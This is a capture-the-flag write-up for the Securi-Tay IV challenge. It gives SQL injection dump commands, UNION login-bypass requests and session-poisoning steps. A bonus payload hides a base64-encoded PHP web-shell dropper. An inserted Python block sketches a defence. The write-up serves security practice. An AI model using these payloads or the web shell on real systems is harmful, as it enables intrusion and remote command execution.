Pentest were pleased to sponsor Securi-Tay IV at Abertay University on 27th February 2015. Thanks to everyone who took part in the challenge at Securi-Tay IV. We hope you enjoyed it. Nobody quite succeeded in breaking the challenge at the event, but one team was very close, so congratulations to them.
If you want to have a go at the challenge, it can be found online at http://securi-tay-2015.pentest-challenge.co.uk/ along with a few hints. The challenge was designed to be difficult, so best of luck to anyone attempting it. If you are going to attempt the challenge, stop reading now! There are spoilers below.
1. Blind injection, Dump Database
The app consists of a username/password authentication form. First we establish that the login is vulnerable to SQL injection. Once the injection has been confirmed, the objective is to extract the database. We use the following query:
"username=admin&password=sdd'and(0)like(0)escape(case(1)when (1=1*)then(1)else(12)end)-- -" -p "username" -u "http://securi-tay-2015-cms.pentest-challenge.co.uk/" -D securi-tay-2015-cms -T auth --dump
We extract the authorisation table and the users table:
2. POST Request
Using the extracted SQL data, the next step is to construct an injected query that returns a row the authentication SQL query accepts as a valid login.
POST http://securi-tay-2015-cms.pentest-challenge.co.uk/ username=1' union select 1,2,3,4,'dXNlcmF1dGhfbG9naW58czoxOiIxIjs='-- -&password=1
Notice that the cookie PHPSESSID value has changed to "4" in your browser.
3. Download the CMS
4. Access the login screen
Access http://securi-tay-2015.pentest-challenge.co.uk/ and set the session id in your browser to the extracted "eaoiqaujfo3c16tqvjarukbrr7"
Next you need to construct a string which will be recognised as valid. You can create a valid serialised string using your own IP address. For example, if you Base64 encode the IP address:
you create the string:
Construct and send the POST request to the CMS to exploit the shared-hosting session poisoning issue:
POST http://securi-tay-2015-cms.pentest-challenge.co.uk/ username=1' union select 1,2,3,'10t39dbpgiglr3tr955cr9dlg5','dXNlcmF1dGhfbG9naW58czoyMDoiYWRtaW4tOTAuMjQ0LjE1Ny4yMTIiOw=='--
Replace '4' with the session id currently being presented at http://securi-tay-2015.pentest-challenge.co.uk/.
POST http://securi-tay-2015-cms.pentest-challenge.co.uk/ username=1' union select 1,2,3,'10t39dbpgiglr3tr955cr9dlg5','dXNlcmF1dGhfbG9naW58czoxOiIxIjs='--
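As an added illustration (not part of the original write-up or the challenge code), the following Python decodes the PHP session-format values used in steps 2 and 4, and shows one way the target app could have refused a forged entry written through the co-hosted CMS: binding its login marker to an HMAC under a per-app key the CMS never holds. The marker format, the functions `make_login_marker`/`verify_login_marker` and the key are assumptions for the example.

```python
import base64
import hashlib
import hmac
from typing import Optional

# Constructed input: the two session values quoted in steps 2 and 4, base64-decoded.
STEP2 = base64.b64decode("dXNlcmF1dGhfbG9naW58czoxOiIxIjs=")
STEP4 = base64.b64decode("dXNlcmF1dGhfbG9naW58czoyMDoiYWRtaW4tOTAuMjQ0LjE1Ny4yMTIiOw==")

def parse_php_session(data: bytes) -> dict:
    """Decode PHP's default session serializer layout: key|<serialize()>key|...
    Scalars (s:, i:, b:, N;) are decoded; an a:/O: payload is kept raw under its
    key so the caller can reject it (a deserialised object is what step 5 abuses)."""
    out, pos = {}, 0
    while pos < len(data):
        bar = data.index(b"|", pos)
        key, tag = data[pos:bar].decode(), data[bar + 1:bar + 2]
        if tag == b"s":                        # s:<bytelen>:"<bytes>";
            colon = data.index(b":", bar + 3)
            n, start = int(data[bar + 3:colon]), colon + 2
            out[key] = data[start:start + n].decode()
            pos = start + n + 2                # skip the closing ";
        elif tag in (b"i", b"b"):              # i:<int>;  b:<0|1>;
            end = data.index(b";", bar)
            raw = int(data[bar + 3:end])
            out[key] = bool(raw) if tag == b"b" else raw
            pos = end + 1
        elif tag == b"N":                      # N;
            out[key], pos = None, bar + 3
        else:                                  # a:/O: left uninterpreted
            out[key] = data[bar + 1:]
            break
    return out

# Hypothetical hardening: the login marker the target app stores is bound to an HMAC
# under a key only that app holds, so an entry written via the co-hosted CMS fails.
def make_login_marker(user: str, ip: str, secret: bytes) -> str:
    body = f"{user}-{ip}"
    return body + ":" + hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()

def verify_login_marker(marker: str, secret: bytes) -> Optional[str]:
    """Return the user name if the marker's HMAC verifies, otherwise None."""
    body, _, mac = marker.rpartition(":")
    if not body or not mac:
        return None
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return body.split("-", 1)[0] if hmac.compare_digest(mac, expected) else None
```

Separating session.save_path per virtual host removes the shared store altogether; the HMAC binding is the defence in depth for when that is not possible.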
5. File upload
This was a bonus challenge created for those who managed to complete the main challenge.
username=1' union select 1,2,3,'10t39dbpgiglr3tr955cr9dlg5','<session><id>any</id><value>TzoxODoiVXNlckF1dGhlbnRpY2F0aW9uIjoxOntzOjY6ImNvbmZpZyI7YTozOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjQ6Imhhc2giO3M6NDoiZXhlYyI7czo4OiJwYXNzd29yZCI7czo4NToiZWNobyBQRDl3YUhBZ2MzbHpkR1Z0S0NSZlIwVlVXeUpqYldRaVhTa2dQejQ9IHwgYmFzZTY0IC0tZGVjb2RlID4+IC4vdXBsb2Fkcy90bXA4LnBocCI7fX0=</value></session>' -- -&password=1
The prize was a set of Beats® wireless speakers, plus a bonus prize for anyone who succeeded in uploading a file to the app.
The winning team consisted of:
Congratulations to both.
Pentest offers a thorough, yet adaptive range of security services to help customers address vulnerabilities in their network or applications. Services include: Secure Coding Workshops, SAST tools, Manual Penetration Testing and Security Audits.
Pentest offers a complete Database Security Assessment Service (DSAS) to businesses that rely on the security of the information held within their databases or have concerns relating to the security compliance of these systems.